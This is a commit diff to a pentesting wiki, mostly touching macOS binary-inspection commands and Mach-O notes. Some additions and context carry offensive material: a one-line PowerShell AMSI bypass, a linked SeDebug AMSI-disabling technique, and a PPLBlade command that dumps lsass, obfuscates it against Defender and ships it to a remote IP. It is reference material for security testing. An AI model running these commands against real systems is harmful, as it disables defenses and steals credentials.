GITBOOK-4078: change request with no subject merged in GitBook

macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md

@@ -23,17 +23,20 @@ otool -tv /bin/ps #Decompile application
 
 ### objdump
 
+{% code overflow="wrap" %}
 ```bash
 objdump -m --dylibs-used /bin/ls #List dynamically linked libraries
 objdump -m -h /bin/ls # Get headers information
 objdump -m --syms /bin/ls # Check if the symbol table exists to get function names
 objdump -m --full-contents /bin/ls # Dump every section
 objdump -d /bin/ls # Dissasemble the binary
+objdump --disassemble-symbols=_hello --x86-asm-syntax=intel toolsdemo #Disassemble a function using intel flavour
 ```
+{% endcode %}
 
 ### jtool2
 
-The tool can be used as a **replacement** for **codesign**, **otool**, and **objdump**, and provides a few additional features.
+The tool can be used as a **replacement** for **codesign**, **otool**, and **objdump**, and provides a few additional features. [**Download it here**](http://www.newosxbook.com/tools/jtool.html).
 
 ```bash
 # Install
@@ -47,7 +50,6 @@ jtool2 -D /bin/ls # Decompile binary
 
 # Get signature information
 ARCH=x86_64 jtool2 --sig /System/Applications/Automator.app/Contents/MacOS/Automator
-
 ```
 
 ### Codesign

macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md

@@ -1,4 +1,4 @@
-# macOS Basic Objective-C
+# macOS Objective-C
 
 <details>
 
@@ -258,11 +258,11 @@ NSMutableArray *mutColorsArray = [NSMutableArray array];
 [mutColorsArray addObject:@"yellow"];
 [mutColorsArray replaceObjectAtIndex:0 withObject:@"purple"];
 
-// Sets
+// Inmutable Sets
 NSSet *fruitsSet1 = [NSSet setWithObjects:@"apple", @"banana", @"orange", nil];
 NSSet *fruitsSet2 = [NSSet setWithArray:@[@"apple", @"banana", @"orange"]];
 
-// Inmutable sets
+// Mutable sets
 NSMutableSet *mutFruitsSet = [NSMutableSet setWithObjects:@"apple", @"banana", @"orange", nil];
 [mutFruitsSet addObject:@"grape"];
 [mutFruitsSet removeObject:@"apple"];

macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md

@@ -148,7 +148,7 @@ There are about **50 different types of load commands** that the system handles
 ### **LC\_SEGMENT/LC\_SEGMENT\_64**
 
 {% hint style="success" %}
-Basically, this type of Load Command define **how to load the sections** that are stored in DATA when the binary is executed.
+Basically, this type of Load Command define **how to load the \_\_TEXT** (executable code) **and \_\_DATA** (data for the process) **segments** according to the **offsets indicated in the Data section** when the binary is executed.
 {% endhint %}
 
 These commands **define segments** that are **mapped** into the **virtual memory space** of a process when it is executed.
@@ -215,12 +215,12 @@ Common segments loaded by this cmd:
 
 * **`__PAGEZERO`:** It instructs the kernel to **map** the **address zero** so it **cannot be read from, written to, or executed**. The maxprot and minprot variables in the structure are set to zero to indicate there are **no read-write-execute rights on this page**. 
   * This allocation is important to **mitigate NULL pointer dereference vulnerabilities**.
-* **`__TEXT`**: Contains **executable** **code** and **data** that is **read-only.** Common sections of this segment:
+* **`__TEXT`**: Contains **executable** **code** with **read** and **execute** permissions (no writable)**.** Common sections of this segment:
   * `__text`: Compiled binary code
   * `__const`: Constant data
   * `__cstring`: String constants
   * `__stubs` and `__stubs_helper`: Involved during the dynamic library loading process
-* **`__DATA`**: Contains data that is **writable.**
+* **`__DATA`**: Contains data that is **readable** and **writable** (no executable)**.**
   * `__data`: Global variables (that have been initialized)
   * `__bss`: Static variables (that have not been initialized)
   * `__objc_*` (\_\_objc\_classlist, \_\_objc\_protolist, etc): Information used by the Objective-C runtime
@@ -289,7 +289,7 @@ The offsets of any constructors are held in the **\_\_mod\_init\_func** section
 The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type.
 
 {% hint style="success" %}
-The data is basically the part containing all the information loaded by the load commands LC\_SEGMENTS\_64
+The data is basically the part containing all the **information** that is loaded by the load commands **LC\_SEGMENTS\_64**
 {% endhint %}
 
 ![](<../../../.gitbook/assets/image (507) (3).png>)

windows-hardening/av-bypass.md

@@ -191,9 +191,11 @@ Since AMSI is implemented by loading a DLL into the powershell (also cscript.exe
 
 Forcing the AMSI initialization to fail (amsiInitFailed) will result that no scan will be initiated for the current process. Originally this was disclosed by [Matt Graeber](https://twitter.com/mattifestation) and Microsoft has developed a signature to prevent wider usage.
 
+{% code overflow="wrap" %}
 ```powershell
 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
 ```
+{% endcode %}
 
 All it took was one line of powershell code to render AMSI unusable for the current powershell process. This line has of course been flagged by AMSI itself, so some modification is needed in order to use this technique.
 

windows-hardening/basic-powershell-for-pentesters/README.md

@@ -204,7 +204,7 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
 
 ### AMSI Bypass 2 - Managed API Call Hooking
 
-Check [**this post for detailed info**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/)\*\*\*\*[ **and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/).
+Check [**this post for detailed info**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/)[ **and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/).
 
 This new technique relies upon API call hooking of .NET methods. As it turns out, .NET Methods need to get compiled down to native machine instructions in memory which end up looking very similar to native methods. These compiled methods can hooked to change the control flow of a program.
 
@@ -217,6 +217,10 @@ The steps performing API cal hooking of .NET methods are:
 5. Find the location of each method in memory
 6. Overwrite the target method with instructions pointing to our malicious method
 
+### AMSI Bypass 3 - SeDebug Privilege
+
+[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) you can see how with enough privileges to debug processes, you can spawn a powershell.exe process, debug it, monitor when it loads `amsi.dll` and disable it.
+
 ## PS-History
 
 ```powershell

windows-hardening/stealing-credentials/README.md

@@ -122,6 +122,22 @@ Get-Process -Name LSASS
 .\procdump.exe -ma 608 lsass.dmp
 ```
 
+## Dumpin lsass with PPLBlade
+
+[**PPLBlade**](https://github.com/tastypepperoni/PPLBlade) is a Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.
+
+**Key functionalities**:
+
+1. Bypassing PPL protection
+2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
+3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)
+
+{% code overflow="wrap" %}
+```bash
+PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
+```
+{% endcode %}
+
 ## CrackMapExec
 
 ### Dump SAM hashes
@@ -322,8 +338,6 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco
 
 [**Learn about some credentials protections here.**](credentials-protections.md)
 
-
-
 <details>
 
 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>